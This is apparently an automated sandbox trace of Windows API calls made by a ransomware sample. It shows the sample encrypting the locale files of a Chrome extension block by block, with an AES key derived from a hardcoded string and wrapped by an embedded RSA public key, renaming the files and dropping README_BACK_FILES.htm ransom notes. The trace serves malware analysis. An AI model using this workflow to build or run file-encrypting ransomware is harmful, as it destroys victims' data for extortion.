[0262.692] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.692] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.692] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.692] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.692] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.693] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.693] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.693] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.693] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x16f, lpOverlapped=0x0) returned 1 [0262.693] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x16f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x170) returned 1 [0262.693] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x170, lpOverlapped=0x0) returned 1 [0262.694] CloseHandle (hObject=0x5d5c) returned 1 [0262.694] CloseHandle (hObject=0x5d60) returned 1 [0262.694] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0262.696] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0262.697] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.gsg")) returned 1 [0262.698] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.fuck")) returned 1 [0262.699] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.699] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.699] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.699] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.699] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.699] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0262.699] AreFileApisANSI () returned 1 [0262.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.700] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.701] GetFileType (hFile=0x5d64) returned 0x1 [0262.701] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.702] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.702] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.702] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.702] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.702] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.702] GetLastError () returned 0x0 [0262.702] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json")) returned 0x20 [0262.702] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0262.703] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.703] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.705] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.705] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.707] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.707] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.707] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.707] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0262.707] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.707] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.707] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74340) returned 1 [0262.707] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74340, dwCertEncodingType=0x1, pInfo=0x2eaccd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eacd00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eacd08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e500) returned 1 [0262.708] CryptEncrypt (in: hKey=0x2e7e500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.708] CryptEncrypt (in: hKey=0x2e7e500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e738a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e738a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.708] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e738a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e738a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.710] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.722] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.723] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.733] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.733] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.733] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.733] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.733] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.734] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.734] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.734] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.734] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.734] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.734] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.734] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.735] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.735] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.735] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | 